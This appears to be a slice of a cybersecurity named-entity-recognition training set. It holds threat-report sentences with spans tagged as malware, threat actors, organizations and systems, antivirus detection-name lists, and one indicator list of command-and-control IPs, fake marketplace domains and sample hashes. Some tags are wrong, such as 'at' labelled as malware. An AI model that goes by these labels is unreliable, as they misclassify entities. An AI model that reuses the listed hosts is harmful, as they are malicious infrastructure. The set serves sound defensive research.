{"text": "A backdoor also known as: Trojan.Startsurf not-a-virus:AdWare.Win32.StartSurf.azas Riskware.Win32.StartSurf.expyou Adware.StartSurf.Win32.40359 BehavesLike.Win32.Dropper.jc TR/Drop.Kaymundler.bldbf Trojan.Application.Strictor.D1C262 Trojan.Win32.Z.Strictor.687398 not-a-virus:AdWare.Win32.StartSurf.azas TrojanDropper:Win32/Kaymundler.C PUP/Win32.OutBrowse.R215127 Adware.StartSurf RiskWare.Patcher Trj/CI.A Win32.Adware.Startsurf.Llhl PUA.StartSurf! Trojan-Dropper.Kaymundler Win32/Application.064", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000505", "source": "cyner2_train"}}
{"text": "The attacks employed PlugX, a Remote Access Trojan RAT widely used in targeted attacks.", "spans": {"MALWARE: PlugX, a Remote Access Trojan RAT": [[21, 54]]}, "info": {"id": "cyner2_train_000506", "source": "cyner2_train"}}
{"text": "AdWind, also known as Frutas, UNRECOM, AlienSpy, and JSocket, is a Java-based RAT.", "spans": {"MALWARE: AdWind,": [[0, 7]], "MALWARE: Frutas, UNRECOM, AlienSpy,": [[22, 48]], "MALWARE: JSocket,": [[53, 61]], "MALWARE: Java-based RAT.": [[67, 82]]}, "info": {"id": "cyner2_train_000507", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9537 BehavesLike.Win32.AdwareWajam.rc Trojan:Win32/WebHijack.A!dll", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000509", "source": "cyner2_train"}}
{"text": "On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted.", "spans": {"SYSTEM: OS X": [[79, 83]], "MALWARE: ransomware,": [[102, 113]]}, "info": {"id": "cyner2_train_000511", "source": "cyner2_train"}}
{"text": "The ransom payment is typically collected using a form of crypto-currency, such as Bitcoin.", "spans": {}, "info": {"id": "cyner2_train_000513", "source": "cyner2_train"}}
{"text": "Whilst we would prefer to disassociate ourselves with APT attacks against Governments our interest was piqued by a particular blog written by our friends over at TrendMicro", "spans": {"THREAT_ACTOR: APT": [[54, 57]], "ORGANIZATION: Governments": [[74, 85]], "ORGANIZATION: TrendMicro": [[162, 172]]}, "info": {"id": "cyner2_train_000514", "source": "cyner2_train"}}
{"text": "Since January 2016, a financially motivated threat actor whom Proofpoint has been tracking as TA530 has been targeting executives and other high-level employees, often through campaigns focused exclusively on a particular vertical.", "spans": {"THREAT_ACTOR: threat actor": [[44, 56]], "ORGANIZATION: Proofpoint": [[62, 72]], "THREAT_ACTOR: TA530": [[94, 99]], "ORGANIZATION: executives": [[119, 129]], "ORGANIZATION: high-level employees,": [[140, 161]], "THREAT_ACTOR: campaigns": [[176, 185]]}, "info": {"id": "cyner2_train_000515", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Injector.Win32.85625 Trojan/Injector.oqf Win32.Trojan.WisdomEyes.16070401.9500.9619 TSPY_INJECTOR_BL210174.TOMC Trojan.Win32.Inject.efoq Trojan.Win32.Inject.dzombd Trojan.Win32.A.Inject.172053 TSPY_INJECTOR_BL210174.TOMC BehavesLike.Win32.Injector.cc Win32.Malware Trojan/Inject.amig TR/Injector.10.12 Trojan/Win32.Inject Trojan:Win32/Meteit.D Trojan.Win32.Inject.efoq Trojan/Win32.VBKrypt.R27475 Trojan.Inject Win32.Trojan.Inject.Htma", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000516", "source": "cyner2_train"}}
{"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"SYSTEM: Android": [[1371, 1378]], "SYSTEM: Google Play": [[1557, 1568]]}, "info": {"id": "cyner2_train_000517", "source": "cyner2_train"}}
{"text": "The campaign was able to steal large amounts of data despite using relatively simple malware because it used clever social engineering tactics against its targets.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]], "MALWARE: malware": [[85, 92]], "THREAT_ACTOR: social engineering": [[116, 134]], "ORGANIZATION: targets.": [[155, 163]]}, "info": {"id": "cyner2_train_000519", "source": "cyner2_train"}}
{"text": "It may also download potentially malicious files.", "spans": {"MALWARE: malicious files.": [[33, 49]]}, "info": {"id": "cyner2_train_000521", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Kryptik.byz Trojan.Win32.Malware.1 Trojan.Kryptik.HFN Packed:W32/RoxorCrypt.A Trojan.DownLoad.35818 TROJ_RENOS.BHAM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000522", "source": "cyner2_train"}}
{"text": "To that end, we are elevating the OilRig attack campaign to be known as the OilRig group.", "spans": {"THREAT_ACTOR: the OilRig attack campaign": [[30, 56]], "THREAT_ACTOR: the OilRig group.": [[72, 89]]}, "info": {"id": "cyner2_train_000523", "source": "cyner2_train"}}
{"text": "We believe the espionage factor and political context make their attacks unique and very different from traditional targeted attacks.", "spans": {"THREAT_ACTOR: the espionage": [[11, 24]]}, "info": {"id": "cyner2_train_000527", "source": "cyner2_train"}}
{"text": "In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two.", "spans": {"THREAT_ACTOR: StrongPity": [[67, 77]], "SYSTEM: systems": [[102, 109]]}, "info": {"id": "cyner2_train_000528", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MiadheardLTO.Trojan Trojan/W32.Mask.348264 Trojandropper.Seedna Troj.W32.Careto!c Trojan/Appetite.c BKDR_CARETO.A W32/Mask.B Backdoor.Weevil.B BKDR_CARETO.A Trojan.Win32.Careto.au Trojan.Win32.Careto.dtnkyq Backdoor:W32/Mask.A W32/Mask.JDVW-6006 Trojan/SGH.c W32.Trojan.Careto Trojan/Win32.SGH Trojan.Mask.3 Trojan.Win32.Careto.au TrojanDropper:Win32/Seedna.A Trojan/Win32.Careto.C258082 Backdoor.Mask Win32/Appetite.C Win32.Trojan.Careto.Tcvo Trojan.SGH! Backdoor.Mask W32/Careto.AU!tr Win32/Trojan.d4e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000532", "source": "cyner2_train"}}
{"text": "Symantec believes that the attackers behind the Anthem breach are part of a highly resourceful cyberespionage group called Black Vine.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: attackers": [[27, 36]], "ORGANIZATION: Anthem": [[48, 54]], "THREAT_ACTOR: cyberespionage group": [[95, 115]], "THREAT_ACTOR: Black Vine.": [[123, 134]]}, "info": {"id": "cyner2_train_000533", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.Multiplug.ch Trojan:Win32/Autophyte.A!dha Backdoor/Win32.Akdoor.R198284", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000534", "source": "cyner2_train"}}
{"text": "The information is ideal for security professionals who investigate suspicious network activity in an Active Directory AD environment.", "spans": {"ORGANIZATION: security professionals": [[29, 51]], "SYSTEM: Active Directory AD environment.": [[102, 134]]}, "info": {"id": "cyner2_train_000536", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Visel.249856 Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Downldr2.DGSB BKDR_VISEL.DEN Win.Trojan.Visel-58 Trojan.Win32.Kebot.wbjcg Trojan.Win32.Downloader.249856.G Backdoor.Win32.Visel.~C BackDoor.Pigeon.12692 BKDR_VISEL.DEN W32/Downloader.STUZ-5379 Trojan[Backdoor]/Win32.Visel Backdoor:Win32/Visel.C Trojan/Win32.Xema.C45221 Backdoor.Visel Backdoor.Visel!uQ/Wu3cIR5E Bck/Pigeon.FK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000538", "source": "cyner2_train"}}
{"text": "This is not the first time the country has been a victim of an APT.", "spans": {"THREAT_ACTOR: APT.": [[63, 67]]}, "info": {"id": "cyner2_train_000539", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Droma.S60541 TrojWare.Win32.Sventore.A Trojan.MulDrop7.3471 W32/Trojan.IGFK-3098 TR/Aenjaris.ofeiu Trojan[Dropper]/Win32.Injector Trojan:Win32/Aenjaris.AI!bit Trojan.Zusy.D3FD29 Dropper/Win32.Injector.C1617864 BScope.Trojan.SvcHorse.01643", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000541", "source": "cyner2_train"}}
{"text": "The use of the obfuscation techniques was novel and this advisory discusses those in detail, along with how we detected them.", "spans": {}, "info": {"id": "cyner2_train_000542", "source": "cyner2_train"}}
{"text": "DiamondFox list of panels.", "spans": {"ORGANIZATION: DiamondFox": [[0, 10]]}, "info": {"id": "cyner2_train_000543", "source": "cyner2_train"}}
{"text": "It tends to reuse old exploits and doesn't make an effort to disguise their activity.", "spans": {}, "info": {"id": "cyner2_train_000544", "source": "cyner2_train"}}
{"text": "Its main target was larger organizations with an annual income of USD 5 million or higher.", "spans": {"ORGANIZATION: organizations": [[27, 40]]}, "info": {"id": "cyner2_train_000546", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Downloader.Quanader TROJ_PLISKAL.SM Trojan.Win32.Pliskal.etapgz Trojan.DownLoader25.64837 Trojan.Pliskal.Win32.48 TROJ_PLISKAL.SM Trojan.Win32.Pliskal Trojan.Zusy.D3EBDA Trojan/Win32.Pliskal.C1788294 Trojan.QuantLoader W32/Vilsel.CYCY!tr.dldr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000547", "source": "cyner2_train"}}
{"text": "A new threat actor group from Europe is selling malware, including the Typhon Stealer, RootFinder Miner, and the Cryptonic Crypter, according to CYFIRMA research team.", "spans": {"THREAT_ACTOR: new threat actor group": [[2, 24]], "MALWARE: malware,": [[48, 56]], "MALWARE: the Typhon Stealer, RootFinder Miner,": [[67, 104]], "MALWARE: the Cryptonic Crypter,": [[109, 131]], "ORGANIZATION: CYFIRMA research team.": [[145, 167]]}, "info": {"id": "cyner2_train_000548", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Buzy.D9C9 Downloader.Pelfpoi TROJ_PELPOI.SMIA Trojan.Win32.Snojan.bxtm TROJ_PELPOI.SMIA BehavesLike.Win32.PUPXAQ.wc Worm/Win32.AutoRun TrojanDownloader:Win32/Pelfpoi.L Trojan.Win32.Snojan.bxtm Downloader/Win32.Korad.R3803 W32/TrojanDldr.QJW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000549", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Phrovon.A TROJ_DLOADER.ZZT TROJ_DLOADER.ZZT Trojan.Win32.VB.euylta TrojWare.Win32.TrojanDownloader.VB.PMEA Trojan.DownLoader6.39644 BehavesLike.Win32.VBObfus.nz W32.Malware.Downloader TR/Dldr.VB.WNE TrojanDownloader:Win32/Phrovon.A Trojan.DL.Phrovon!yEJ5Hieu3rA Trojan-Downloader.Win32.Phrovon W32/VB.CWZ!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000550", "source": "cyner2_train"}}
{"text": "There is a new malware called Rurktar.", "spans": {"MALWARE: new malware": [[11, 22]], "MALWARE: Rurktar.": [[30, 38]]}, "info": {"id": "cyner2_train_000551", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.VBNA!O Trojan.VB.Win32.37651 Trojan.Heur.VP.E1E33B Win32.Trojan.WisdomEyes.16070401.9500.9951 Win.Trojan.VB-23833 Worm.Win32.VBNA.b Trojan.Win32.VB.etozpu W32.W.VBNA.lrnh Win32.Worm.Vbna.Sxew Trojan.DownLoader5.9157 Trojan.Win32.Doxiss W32/Trojan.DVWP-9373 Worm.VBNA.ahfg Worm/Win32.VBNA Trojan:Win32/Doxiss.A Worm.Win32.A.VBNA.147456.BA Worm.Win32.VBNA.b Worm/Win32.VBNA.C118872 TScope.Trojan.VB Win32/Spy.VB.NXN TrojanSpy.VB!5WGwmuBMWXM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000552", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.i Trojan/Crypt.i Win32/TrojanProxy.Lager.F W32/Lager.AI Trojan.Abwiz.D Klone.R Trojan.Crypt Trojan-Proxy.Win32.Lager.q Trojan.Proxy.Lager.Q Trojan-Proxy.Win32.Lager!IK TrojWare.Win32.TrojanProxy.Lager.F Trojan.Proxy.Lager.Q Trojan.Lopata TR/Drop.Abwiz TROJ_LAGER.F Trojan/Crypt.bh Trojan.Proxy.Lager.Q W32/Lager.AI Win-Dropper/Small.agq Trojan-Proxy.Win32.Lager.f Trojan-Proxy.Lager.f Trojan-Proxy.Win32.Lager Proxy.NM Bck/Galapoper.HP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000555", "source": "cyner2_train"}}
{"text": "This is an interesting attack of the infamous Syrian Electronic Army SEA.", "spans": {"THREAT_ACTOR: infamous Syrian Electronic Army SEA.": [[37, 73]]}, "info": {"id": "cyner2_train_000556", "source": "cyner2_train"}}
{"text": "Many of the targets are involved in litigation with the government of Kazakhstan in European and American courts whose substance ranges from attempts by the government of Kazakhstan to unmask the administrators behind an anonymous website that publishes leaks alleging government corruption Kazaword to allegations of kidnapping.", "spans": {"ORGANIZATION: the government of Kazakhstan": [[52, 80], [153, 181]], "ORGANIZATION: American courts": [[97, 112]]}, "info": {"id": "cyner2_train_000557", "source": "cyner2_train"}}
{"text": "ESET researchers have since analyzed samples of malware, detected by ESET as Win32/Industroyer, capable of performing exactly that type of attack.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "MALWARE: malware,": [[48, 56]], "ORGANIZATION: ESET": [[69, 73]]}, "info": {"id": "cyner2_train_000560", "source": "cyner2_train"}}
{"text": "To infect a Windows computer, the user has to execute the malware by double-clicking on the .jar file.", "spans": {"SYSTEM: Windows computer,": [[12, 29]], "MALWARE: malware": [[58, 65]]}, "info": {"id": "cyner2_train_000561", "source": "cyner2_train"}}
{"text": "ServStart is primarily used by attackers located in China, in a mix of targeted and opportunistic attacks.", "spans": {"MALWARE: ServStart": [[0, 9]], "THREAT_ACTOR: attackers": [[31, 40]]}, "info": {"id": "cyner2_train_000564", "source": "cyner2_train"}}
{"text": "FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission SEC filings at various organizations.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: FIN7 spear phishing campaign": [[28, 56]], "ORGANIZATION: personnel": [[67, 76]], "ORGANIZATION: United States Securities and Exchange Commission SEC": [[91, 143]], "ORGANIZATION: various organizations.": [[155, 177]]}, "info": {"id": "cyner2_train_000565", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Win32.Trojan.WisdomEyes.16070401.9500.9976 Backdoor.Win32.Hupigon.pjz BackDoor.Klj.25 BehavesLike.Win32.PWSGamania.fc Backdoor.Win32.Hupigon Trojan.Zilix.1 Backdoor.Win32.Hupigon.pjz Trojan/Win32.Hupigon.C127321 TScope.Trojan.Delf Win32.Backdoor.Hupigon.dgrz", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000567", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ursu.D15C9E Win32.Trojan.WisdomEyes.16070401.9500.9977 Backdoor.Trojan BKDR_ZEGOST.SM44 Trojan.Win32.Farfli.extksh Trojan.Win32.Z.Zegost.671744.A TrojWare.Win32.AntiAV.~D BKDR_ZEGOST.SM44 BehavesLike.Win32.Dropper.jm W32/Trojan.VXKT-0024 BDS/Zegost.pmxfd Trj/GdSda.A Win32.Trojan-gamethief.Onlinegames.Dvgf Backdoor.Win32.Dedipros Win32/Trojan.6ef", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000568", "source": "cyner2_train"}}
{"text": "By mid-1998 the FBI and Department of Defense investigators had forensic evidence pointing to Russian ISPs.", "spans": {"ORGANIZATION: the FBI": [[12, 19]], "ORGANIZATION: Department of Defense investigators": [[24, 59]]}, "info": {"id": "cyner2_train_000570", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Diple!O Worm.Yames W32/VBTrojan.9!Maximus WORM_YAMES.A WORM_YAMES.A Worm.Win32.VB W32/VBTrojan.9!Maximus Worm:Win32/Yames.A Trj/CI.A Win32/VB.ODO Win32.Worm.Vb.Sxeo W32/Vb.A!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000572", "source": "cyner2_train"}}
{"text": "Regin has a wide range of standard capabilities, particularly around monitoring targets and stealing data.", "spans": {"MALWARE: Regin": [[0, 5]]}, "info": {"id": "cyner2_train_000573", "source": "cyner2_train"}}
{"text": "Due to the violation of the integrity and availability of the web resources of a number of state organizations, the Government Computer Emergency Response Team of Ukraine CERT-UA is taking measures to investigate the circumstances of the incident on February 23, 2023.", "spans": {"VULNERABILITY: integrity": [[28, 37]], "SYSTEM: web resources": [[62, 75]], "ORGANIZATION: state organizations, the Government Computer Emergency Response Team of Ukraine CERT-UA": [[91, 178]]}, "info": {"id": "cyner2_train_000574", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Mimikatz.S1196261 Tool.Mimikatz.Win32.409 W32/Petya.S Ransom.Petya Win.Trojan.Mimikatz-6331391-0 Riskware.Win32.Mimikatz.eqnxjb Troj.PSW32.W.WinCred.tp7F Win32.Trojan.Mimipet.Aiin Trojan:W32/Petya.H Tool.Mimikatz.64 W32/Petya.VKHI-2239 Trojan.Petya.e TR/Mimipet.airfqba Trojan[PSW]/Win32.WinCred Trojan:Win32/Petya.B!rsm Win32.Riskware.Mimikatz.A Trojan/Win32.Petya.R203330 Trojan.Ransom.Petya BScope.Trojan-Dropper.Injector Trojan.Petya Win32/RiskWare.Mimikatz.U Trojan.PWS.WinCred! hacktool.mimikatz W32/Petya.A!tr.ransom Trj/CryptoPetya.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000575", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BitcodeN.Trojan Trojan.Dropper.VRM Trojan.FakeAV Trojan.Dropper.VRM TSPY_VBKEYLOG.SM Win32.Trojan.WisdomEyes.16070401.9500.9793 Win32/Tnega.ASRH TSPY_VBKEYLOG.SM Trojan.Dropper.VRM Trojan.Dropper.VRM Trojan.Dropper.VRM BehavesLike.Win32.Downloader.bh TR/Spy.jyiej Trojan:Win32/Glod.B Trojan.Dropper.VRM Trojan.Dropper.VRM Trojan.KeyLogger.OEU Win32/Spy.KeyLogger.OEU Backdoor.Win32.Xtrat", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000576", "source": "cyner2_train"}}
{"text": "Since then, we've encountered more samples in the wild.", "spans": {}, "info": {"id": "cyner2_train_000577", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.GJUE Hacktool.Rootkit Win32/Fuzfle.BZ Trojan.Win32.Sentinel.cquvjc Trojan.Sentinel.based Trojan.Spammer W32/Trojan.UUTE-6344 Trojan/Win32.Unknown Spammer:WinNT/Srizbi.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000578", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Trojan.Kryptik.Win32.1323308 Win32.Trojan.Kryptik.aio Ransom.TeslaCrypt!g6 WORM_HPKASIDET.SM0 Trojan.Win32.Kryptik.evtvij Trojan.DownLoader25.63634 WORM_HPKASIDET.SM0 BehavesLike.Win32.Downloader.cc Trojan-Downloader.Win32.Wauchos Worm.Ngrbot.aeb TR/Crypt.ZPACK.avthl Backdoor:Win32/Pigskarb.A Trojan.Symmi.D104A4 Trojan/Win32.Upbot.C1489911 W32/Kryptik.FXQD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000580", "source": "cyner2_train"}}
{"text": "At the request of the German Bundestag the BSI analyzed these problems in network traffic.", "spans": {"ORGANIZATION: the German Bundestag the BSI": [[18, 46]], "SYSTEM: network traffic.": [[74, 90]]}, "info": {"id": "cyner2_train_000581", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.335 W97M.Downloader.AFY W97M/Downloader.bxd VB:Trojan.Valyria.335 W97M.Downloader Win32/DarkNeuron.A W2KM_DARKNEURON.A VB:Trojan.Valyria.335 Trojan.Ole2.Vbs-heuristic.druvzi Heur:Trojan.Script.Downloader.7020638.0 VB:Trojan.Valyria.335 W2KM_DARKNEURON.A W97M/Downloader.bxd TrojanDropper:O97M/DarkNeuron.A!dha VB:Trojan.Valyria.335 virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000584", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.Win32.BypassUAC.gmk Trojan.MulDrop7.677 BehavesLike.Win32.BadFile.ch Trojan-Downloader.MSIL.Tiny W32/Trojan.RVEW-7367 Exploit.Win32.BypassUAC.gmk TrojanDownloader:MSIL/BrobanDel.C!bit Win32.Trojan.Downloader.Phqh MSIL/Tiny.QK!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000585", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DowlodN.Trojan W32/Downldr2.BCPJ Win.Downloader.24666-2 Trojan.Spambot.3004 BehavesLike.Win32.MoonLight.mc W32/Downloader.EITQ-0059 Trojan:Win32/Pramro.A Trojan.Win32.Downloader.28160.AO Trojan/Win32.CSon.R2002 Virus.Win32.Sality Bck/Spambot.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000588", "source": "cyner2_train"}}
{"text": "Ovidiy Stealer is priced at 450-750 Rubles ~$7-13 USD for one build, a price that includes a precompiled executable that is also crypted to thwart analysis and detection.", "spans": {"MALWARE: Ovidiy Stealer": [[0, 14]], "MALWARE: crypted": [[129, 136]]}, "info": {"id": "cyner2_train_000589", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Sekur.14236 Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.Z.Sirefef.150528 Win32.Trojan.Crypt.Ligd BackDoor.Anunak.8 W32/Trojan.RFBB-7838 Trojan.Sirefef.181 PWS:Win32/Sekur.A Trj/GdSda.A Win32/Trojan.0c8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000590", "source": "cyner2_train"}}
{"text": "Once they have access to the network they proceed to encrypt multiple Windows systems using SamSam.", "spans": {"SYSTEM: Windows systems": [[70, 85]], "MALWARE: SamSam.": [[92, 99]]}, "info": {"id": "cyner2_train_000592", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bladabindi.FC.2865 Trojan/Bladabindi.u TROJ_SPNR.0BGN14 Win32.Trojan.WisdomEyes.16070401.9500.9994 Win32/Tnega.MAGYUTC TROJ_SPNR.0BGN14 MSIL.Backdoor.Bladabindi.AX BackDoor.NJRat.355 HackTool.MSIL W32/Trojan.UVRI-0473 Trojan/MSIL.fiv W32.Hack.Tool HackTool:MSIL/Jaktinier.A!plugin HackTool.Jaktinier Trj/CI.A MSIL/Bladabindi.U Win32/Trojan.b0d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000593", "source": "cyner2_train"}}
{"text": "ITG03 actors stole money from multiple international banks via the compromise of the interbank funds transfer system SWIFT in 2016.", "spans": {"THREAT_ACTOR: ITG03 actors": [[0, 12]], "ORGANIZATION: multiple international banks": [[30, 58]], "ORGANIZATION: the interbank funds": [[81, 100]], "SYSTEM: transfer system SWIFT": [[101, 122]]}, "info": {"id": "cyner2_train_000595", "source": "cyner2_train"}}
{"text": "This appears to be an attack campaign focused on espionage.", "spans": {"THREAT_ACTOR: attack campaign": [[22, 37]], "THREAT_ACTOR: espionage.": [[49, 59]]}, "info": {"id": "cyner2_train_000596", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.DC2FF Win32.Trojan.WisdomEyes.16070401.9500.9877 Trojan.Win32.VB.ctxv Troj.W32.VB.mgqM Win32.Trojan.Vb.Ahyc TrojWare.Win32.Injector.DSTF Trojan:W32/Bepush.B Trojan.Blocker.Win32.25483 BehavesLike.Win32.Dropper.jh Trojan/VB.cxjy TR/Crypt.cfi.besd Trojan.Win32.VB.ctxv Trojan/Win32.Asprox.R132179 Win32/VB.RTN Trojan.VB!fKAQ4AnWSUA Trojan.Crypt W32/ExtenBro.AK!tr Win32/Trojan.682", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000597", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Zbot.A4 Backdoor.Bot Troj.Dropper.W32.Dapato!c Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.Zbot Win32.Trojan.Injector.CZ Trojan-Dropper.Win32.Dapato.ezng Trojan.Win32.Dapato.driscq Trojan.Emotet.63 BehavesLike.Win32.VirRansom.cc Trojan.Win32.Injector Trojan/Yakes.tsq Trojan/Win32.Deshacop Spammer:Win32/Emotet.G Trojan-Dropper.Win32.Dapato.ezng Trojan/Win32.Injector.R140545 BScope.Malware-Cryptor.Hlux Trj/PasswordStealer.BT W32/Injector.BYFS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000600", "source": "cyner2_train"}}
{"text": "The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks.", "spans": {"MALWARE: at": [[20, 22]], "ORGANIZATION: organization": [[33, 45]]}, "info": {"id": "cyner2_train_000602", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_RUCE.C Win32.Trojan.WisdomEyes.16070401.9500.9969 TROJ_RUCE.C W32/Trojan.UCZC-3562 TR/Ruce.44544A Trojan.Hiloti.2 Trojan/Win32.Ruce.C1864771 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000604", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Dapato.59904.C Trojan.Foidan Spyware.Zbot.ED TROJ_SPNR.11EJ13 Win32.Trojan.WisdomEyes.16070401.9500.9898 Trojan.Zbot TROJ_SPNR.11EJ13 Trojan-Dropper.Win32.Dapato.cdtt Trojan.Win32.Dapato.cqljwd Troj.Dropper.W32.Dapato.cdtt!c TrojWare.Win32.Kryptik.BAXK Trojan.Inject1.21866 Dropper.Dapato.Win32.27589 Trojan-Spy.Win32.Zbot W32/Trojan.JZAQ-0520 TrojanDropper.Dapato.sad TR/Drop.Dapato.cdtt Trojan[Dropper]/Win32.Dapato Trojan.Zusy.DD28A Trojan-Dropper.Win32.Dapato.cdtt Trojan:Win32/Foidan.A TrojanDropper.Dapato Win32.Trojan-dropper.Dapato.Pgng Trojan.DR.Dapato!3ZrfcO/CUjc W32/ZAccess.Y!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000605", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSIS Troj.Nsis.Decryptor!c Trojan.Win32.Z.Decryptor.478934 Trojan.Inject1.52881 Trojan.Inject3 W32/Trojan.SALD-6852 Win32/Injector.BQWC Trojan.NSIS.Decryptor.m TrojanDropper:Win32/Bondat.A Trojan.Decryptor!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000607", "source": "cyner2_train"}}
